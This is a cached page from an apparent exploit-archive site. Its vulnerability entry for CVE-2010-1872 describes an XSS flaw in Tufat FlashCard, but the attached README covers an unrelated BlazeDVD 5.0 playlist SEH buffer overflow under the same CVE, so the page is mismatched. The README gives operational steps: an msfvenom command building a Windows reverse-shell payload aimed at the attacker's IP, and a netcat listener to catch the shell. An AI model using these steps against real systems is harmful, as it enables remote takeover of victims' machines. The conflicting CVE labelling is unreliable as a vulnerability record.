Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2010-1872 PoC — Tufat FlashCard 'cPlayer.php'跨站脚本攻击漏洞

Source
Associated Vulnerability
Title:Tufat FlashCard 'cPlayer.php'跨站脚本攻击漏洞 (CVE-2010-1872)
Description:FlashCard Magic是一款数学教学抽认卡游戏可以训练乘法和基于国家数学课程标准的基础数学知识。该软件使用一个时间和得分相结合的方式来激发一个学生天生的竞争倾向。 FlashCard的cPlayer.php存在跨站脚本攻击(XSS)漏洞,远程攻击者可提供id参数注入任意web脚本或HTML。
Readme
# BlazeDVD 5.0 - '.PLF' Playlist SEH Buffer Overflow Exploit (CVE-2010-1872)

Proof-of-Concept (PoC) exploit targeting a buffer overflow vulnerability in BlazeDVD version 5.0 via a crafted `.plf` playlist file. The exploit uses **SEH (Structured Exception Handler) overwrite** to achieve code execution.

## 📌 Details

- **Software:** BlazeDVD
- **Version:** 5.0
- **Vulnerability:** Buffer Overflow via `.plf` file
- **Technique:** Structured Exception Handler (SEH) Overwrite
- **CVE:** [CVE-2010-1872](https://nvd.nist.gov/vuln/detail/CVE-2010-1872)
- **Tested on:** Windows XP SP3 (DEP and ASLR disabled)

## ⚠️ Disclaimer

This code is for **educational and research purposes only**. Any misuse of this code may violate local or international laws. I do not take any responsibility for damage caused by improper use.

## 🧠 How It Works

The exploit generates a malicious `.plf` file which, when opened in BlazeDVD, triggers a buffer overflow and overwrites the SEH (Structured Exception Handler), redirecting execution to a reverse shell payload.

## 🛠️ Usage

1. **Generate the Shellcode with msfvenom**  
   Use `msfvenom` to create a reverse shell payload in raw format, avoiding bad characters.

   ```bash
   msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Replace the shellcode inside the exploit script with the output from msfvenom.

2. **Start Netcat (Listener)**
    In another terminal, start listening on the selected port 8443:

    ```shell
    nc -lvnp 8443
    ```

Catch the Reverse Shell
If successful, a reverse shell will connect to your listener.
File Snapshot

[4.0K] /data/pocs/3a0672780f0e661311fd838de2a2b63a6aa9575a ├── [3.6K] exploit.c └── [1.6K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.